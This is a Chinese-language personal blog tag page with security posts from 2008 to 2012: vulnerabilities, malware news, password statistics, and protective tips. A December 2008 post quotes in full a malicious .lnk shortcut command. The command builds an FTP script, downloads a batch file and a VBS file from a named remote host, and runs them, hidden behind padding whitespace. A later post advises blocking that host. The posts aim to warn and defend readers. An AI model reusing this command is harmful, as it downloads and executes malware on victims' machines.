顯示具有 系統安全 標籤的文章。 顯示所有文章
顯示具有 系統安全 標籤的文章。 顯示所有文章

2012年1月2日 星期一

ASP.NET 發現重大資安弱點影響範圍涵蓋 ASP.NET 1.1 ~ 4.0

...由於這類攻擊手法已於 2011-12-28 在德國的 Chaos Communication Congress 駭客年會中被公開,研究員 Julian Wälde 與 Alexander Klink 在現場展示如何透過一個自訂的表單攻擊目前市面上多個知名的 網站應用程式框架 (Web Application Frameworks),其中包括 PHP 4, PHP 5, Java / JSP, Apache Tomcat, Jetty, ASP.NET, Python, v8, … 等,他可以利用極少的 HTTP Requests 癱瘓現有的網站伺服器,而且不僅僅是 ASP.NET 可能受害,許多其他 Web 框架依然無法倖免於難!...

請大家盡快更新系統囉!

延伸閱讀:ASP.NET 發現重大資安弱點影響範圍涵蓋 ASP.NET 1.1 ~ 4.0

2011年11月6日 星期日

微軟發布惡意軟體 Duqu 處理方案

這次是透過 TrueType 字型引擎漏洞進行入侵,而且是各個 Windows 版本,且是 kernel mode 層級的漏洞,顯然會引起大風波啊~

微軟發布惡意軟體 Duqu 處理方案,但仍有更根本的問題要解決...

2011年11月1日 星期二

駭客為了救出同伴,向墨西哥黑道宣戰

「知名駭客組織 - Anonymous,為了救出被墨西哥毒梟 Zetas 集團所綁架的夥伴,拍了一段影片向黑道宣戰,要求對方釋放人質,不然會11/5以激烈的手段來報復!」

讓我聯想到漫畫「血色星期一」第二部的劇情,精明的駭客可能不需槍砲彈藥,但發揮的威力更為強大。不過這個組織有沒有這個實力可以挑戰整個黑幫,而釋放回來的人質是不是還能活著,都是個問號啊~

槍砲與鍵鼠之戰的序幕 - 駭客為了救出同伴,向墨西哥黑道宣戰

2011年6月16日 星期四

iPhone用戶 最愛用的10組懶人密碼

新聞:iPhone用戶 最愛用的10組懶人密碼

以往手機用簡單的四位數字作為密碼,因為裡面也沒太多隱私資料,但隨著智慧型手機越來越普及,其實是該挑一個比較安全的密碼了!畢竟現在拿到手機,就等於拿到信箱、社交網站、照片各種資料的存取權限了~

2011年5月9日 星期一

神秘的病毒 - Stuxnet

這個神秘的病毒,會不會引爆全世界的核電廠,然後人類宣告滅亡呢?

朱學恆:「在伊朗境內開始流傳一種電腦病毒,這個病毒的編碼長達一萬五千行,由一大一小兩個零件所組成,幾乎可以說是資安人員所看過最複雜和先進的程式設計與安排。

問題來了,這個病毒雖然被稱做電腦病毒,卻不會對被感染的機器做出任何動作。資安專家測試了各種機型,各種設備,但他們手上有的機器卻都不對這個病毒的胃口。這個病毒只是一直靜靜的潛伏著,彷彿在等待它這輩子唯一期待的伴侶。 」

2010年7月2日 星期五

Windows Help and Support Center 漏洞(轉貼)

轉貼 國家資通安全會報 技術服務中心漏洞/資安訊息警訊:

技術服務中心於近日發現,駭客利用Windows Help and Support Center尚未修補的弱點(CVE-2010-1885),Microsoft Security Advisory(2219475),透過惡意網頁連結或在文件中附加惡意網頁連結的方式進行攻擊。當使用者點擊這類惡意連結時,使用者電腦便可能遭植入惡意程式,攻擊者將可控制受害系統執行任意惡意行為。本中心已發現駭客經由電子郵件使用該弱點之WORD文件進行攻擊,由於目前微軟尚未修補此弱點,建議使用者參照以下建議措施來防堵這類的攻擊手法
[[MORE]]
建議措施

  1. 備份 HKEY_CLASSES_ROOT\HCP檔案後刪除,待微軟釋出修補程式後,重新匯入該檔案。
    備分方式:點擊開始 > 執行,輸入Regedit進入登錄編輯程式,點擊HKEY_CLASSES_ROOT\HCP檔案 >右鍵選擇匯出 > 選擇匯出目錄,命名為HCP_Procotol_Backup.reg後,將 HKEY_CLASSES_ROOT\HCP 刪除匯入方式:點擊開始 > 執行,輸入Regedit進入登錄編輯程式,點擊「檔案」>「匯入」>擇擇「HCP_Procotol_Backup.reg」以重新匯入
    備註:微軟說明及支援中心可能無法正常使用

  2. 使用自動修正程式

  3. 請勿開啟未受確認之電子郵件附件程式及附加之網頁連結



參考連結:XP零時差漏洞攻擊現身 Google工程師遭批

10 個有用的 WordPress 安全技巧

大家可以參考看看:

10 Useful WordPress Security Tweaks

安全使用開放的無線網路

How to Stay Safe on Public Wi-Fi Networks

這是一篇 LifeHacker 的文章,簡單說明了出門在外使用開放的無線網路需要注意的安全事項。

主要是

  1. 關閉檔案分享

  2. 打開防火牆

  3. 到哪裡都使用 SSL 加密(以 gmail 設定為例)

  4. 使用VPN

  5. 如果用不到,請把無線網路訊號關閉


[[MORE]]
在自動化設定網路方面,Windows 本身內建就有提供相關的配置,例如每次連到一個新的網路,作業系統都會詢問這是「住家、公司、還是開放場所」,針對不同的環境,系統會根據隱私權政策去進行適當的設定。但是畢竟這個相當陽春,如果時常拿著筆記型電腦到處移動,常常需要連上各種不同設定的網路的話,那麼 NetSetMan 是一個好物。

瀏覽器安全的方面,我們都知道盡可能使用 https 加密連線是比較安全的,很多網站也都有提供這協定,但卻不是預設使用,你可以透過 HTTPS Everywhere 這個 Firefox 擴充套件,在連上 Google Search、Wikipedia、Twitter、Facebook... 等網站的時候會自動使用 https 的加密協定。

而如果事業沒作那麼大的個人使用者,沒有公司 VPN 可用,也可以透過另一台可信任的電腦,安裝 Hamachi,這樣就有了自己的 VPN 了。

2010年1月18日 星期一

2009年10月8日 星期四

Statistics from 10,000 leaked Hotmail passwords

有駭客把超過 10000 以上的 Hotmail 帳號密碼貼到公開網站上,隨後有人針對這些帳號進行一些分析統計。
發現大多數是使用非常貧弱的密碼,例如 123456。相關分析請看原文:

Statistics from 10,000 leaked Hotmail passwords

2009年3月13日 星期五

什麼手機容易被簡訊木馬竊聽?

在被監聽對象的手機上裝一個小軟體,就可以做到以下這些事,而被監聽者並不曉得:

1. 手機即時通話監聽 (可監聽手機雙方通話內容)
2. 手機現場環境監聽 (監聽手機周圍聲音)
3. 手機簡訊攔截 (簡訊複製記錄功能)
4. 手機即時通聯記錄 (已接.未接.撥出的往來電話記錄)
5. 手機開關機通知(簡訊即時告知開關機功能)
6. 手機遠端遙控功能開啟與關閉 (經由簡訊可設定監控手機功能設定)
7. 手機換卡通知 (經由簡訊即時通報手機換卡號碼)

在手機越來越智慧化的同時,它也越來越像小型的電腦,將來應該會有不少針對手機設計的後門或病毒程式吧!

全文請看:酷玩意部落格(sharecool.org)

2009年2月9日 星期一

lnk 附件木馬

對於此木馬的描述,請看前文「病毒:我設計的你看看」。

由於此類木馬,透過電子郵件傳播時,附件以「lnk」格式存在,亦即所謂的「捷徑」,各家防毒系統都不會加以阻攔。因為捷徑本身並不是病毒,捷徑本身所指的位置(或動作)才可能是病毒。

近來此類病毒由於可以穿透各防毒系統,似乎有越來越氾濫的趨勢。小弟在此提供幾個建議:

使用者端:
使用較聰明的客戶端郵件軟體,透過過濾規則將此類郵件濾除,避免誤點。
例如 Gmail 可以進入
Settings / Filters / Create a new Filter / Has the words: 「lnk」 / 勾選「Has Attachment」 / Delete it (英文介面)
設定 / 篩選器 / 建立新的篩選器 / 包含字詞: 「lnk」 / 勾選「有附件」/ 選擇動作「刪除此會話群組」
(中文介面)

管理者端:
直接針對 mail server 進行修改,阻擋 lnk 格式的附件。
例如修改 amavisd.conf,在過濾 exe、bat 的地方,再加上lnk。
然後防火牆直接過濾捷徑連上的伺服器,例如:lin31003100.3322.org

2008年12月12日 星期五

病毒:我設計的你看看

今天收到一個用 E-mail 寄來的病毒,標題如上。(那是信件標題,病毒不是我設計的!)

裡面附了一個檔案,是 .lnk 的捷徑檔,原本以為是打開後會連到惡意網站,結果仔細一看內容如下。
捷徑後面故意附了一長串空白,讓使用者用「內容」去看的時候,會看到空無一物。
可是我連上去,惡意程式無法下載,可能是伺服器負荷過大?
這種方式我倒是第一次看到,(可能是我孤陋寡聞),算是蠻有創意的一個病毒,是不是該稱讚一下?

"%windir%\system32\cmd.exe /c echo open lin31003100.3322.org > t.t&echo 123>>t.t&echo 123>>t.t&echo get down2.bat c:\down2.bat >> t.t&echo get vnet2.vbs %windir%\vnet2.vbs >> t.t&echo bye >> t.t&ftp -s:t.t&del t.t&start %windir%\vnet2.vbs&                    "

2008年10月11日 星期六

新的攻擊手法 Clickjacking

Clickjacking 是一個新的惡意攻擊手法,而且目前各廠牌瀏覽器都還沒有修補的方案。
參考以下資料:

[[MORE]]
簡單的說,大家都知道不明網站上的連結不要亂點,尤其出現問你「是否同意」、「確認、取消」的對話框時要特別注意。但這個漏洞則是利用 CSS 的排版技巧,用圖層去遮蓋連結。你可能只是在網頁上玩 Game,並在遊戲畫面上點來點去,結果你不知不覺點了「我同意」或是「確認」的按鈕。透過這個手法,駭客可以在你電腦中安裝軟體(因為你同意了嘛),也可以看到你的webcam視訊畫面(因為你也同意了啊),也可以傳回你的私人資料(對,你還是同意了)當然還有很多很多可能。

如果想節省時間的朋友,可以直接看這段影片瞭解該手法實際應用時的樣子:Youtube

膽子大一點的可以實際體驗一下遭受攻擊的感覺:Camera ClickJacking - The Game

我剛剛試了一下 Firefox + NoScript 擴充套件,預設是不會被攻擊的。再進一步解決方法出現之前,建議大家可以先安裝 NoScript 套件,雖然上網會不方便些,但是相對的安全許多。

還有不要上不明的網站,也要小心常上的網站突然改變排版或突然問你很多問題。

2008年10月9日 星期四

馬賽克的危險

有時候為了「有圖有真相」,有的人會把一些私人資料放到部落格,例如身份證、帳單等等,但又為了安全起見,放上去的圖片會用馬賽克把敏感的部分抹除。(例如消去身份證字號幾個號碼)

但小心了,馬賽克所抹除的文數字是有可能被還原回來的!

因為馬賽克雖然把文字內容變成圖塊,但不同的文字可能會變成不同顏色的圖塊,使用程式反覆比對,是可能還原出原始文數字的。那...有沒有解決的方法呢? 就是不要使用馬賽克,改用全黑、全白的單色方塊直接劃掉那些資訊,就像報紙上新聞照片處理被害者的眼睛那樣。

請看以下的原理與實作範例: